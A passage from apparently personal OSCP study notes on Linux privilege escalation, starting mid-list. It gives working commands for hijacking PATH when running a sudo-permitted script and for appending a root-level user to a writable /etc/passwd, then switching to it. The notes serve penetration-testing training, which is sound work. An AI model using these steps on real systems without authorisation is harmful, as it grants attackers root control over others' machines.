anindya14/OSCP-study/Privilege-escalation/Linux/Readme.md

     e.
 Now set the PATH environment variable to /tmp and also execute the cleanup.sh script to priv esc

          sudo PATH=/tmp:$PATH /opt/cleanup.sh

+if you have read/write access to /etc/passwd you can: openssl passwd <whateverPasswordYouWant>
+echo "myUser:<openSSLHash>:0:0:root:/root:/bin/bash" >> /etc/passwd
+su myUser